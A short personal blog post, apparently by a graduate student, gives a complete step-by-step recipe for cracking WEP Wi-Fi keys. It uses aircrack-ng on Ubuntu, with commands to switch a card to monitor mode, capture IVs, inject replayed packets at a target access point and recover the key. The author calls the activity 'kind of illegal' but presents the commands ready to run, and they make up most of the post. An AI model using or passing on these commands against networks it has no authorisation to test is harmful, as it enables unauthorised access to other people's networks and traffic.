Note on hacking

Since this behavior is kind of illegal, I shall only record it for academic purpose. ONLY FOR WEP.



While WPA/WPA2 are not safe either, just need more time to crack the password, however, it depends on the complexity of the password, though much safer than WEP, also can be cracked in hours.

Assuming the OS is Ubuntu 12.04, which might introduce a little bit problem on network channel.

1. Installation of Aircrack-ng 1.1

sudo apt-add-repository ppa:aking1012-com/aircrack-precise

sudo apt-get update

sudo apt-get install aircrack-ng

2. Use wlan0 as moniter, do not use command airmon-ng any more, it will cause some problem with the channels. Where ‘$@’ is the channel number, we assume it is 6. Run this bash file first to change wlan0 into a monitor.


ifconfig $IFACE down
iwconfig $IFACE mode managed
ifconfig $IFACE up
iwconfig $IFACE channel $@
ifconfig $IFACE down
iwconfig $IFACE mode monitor
ifconfig $IFACE up

iwconfig $IFACE.

3. Crawl ivs packages. Note: Here we use wlan0 as a moniter, not mon0 any more.

sudo airodump-ng –ivs -w data -c 6 wlan0

4. Set a new terminal and begin to inject the AP. xx:xx:xx:xx:xx:xx is AP’s MAC, and yy:yy:yy:yy:yy:yy is your own MAC. Here we do not consider the AP has filtered MAC. You may see your own MAC through ‘ifconfig -a’, and you can read AP’ MAC on screen.

sudo aireplay-ng -1 0 -a xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy wlan0

sudo aireplay-ng -3 -b xx:xx:xx:xx:xx:xx -h yy:yy:yy:yy:yy:yy wlan0

5. Wait until the #Data goes up to around 15000[just for sure.]

6. Crack! If failed, just wait for next 5000 ivs.

sudo aircrack-ng -n 64 -b xx:xx:xx:xx:xx:xx data-01.ivs

About YiMin

This is just a nerd PhD student of Math@UT Austin.

6 thoughts on “Note on hacking

  1. Yi-Huang Shen says:


Comments are closed.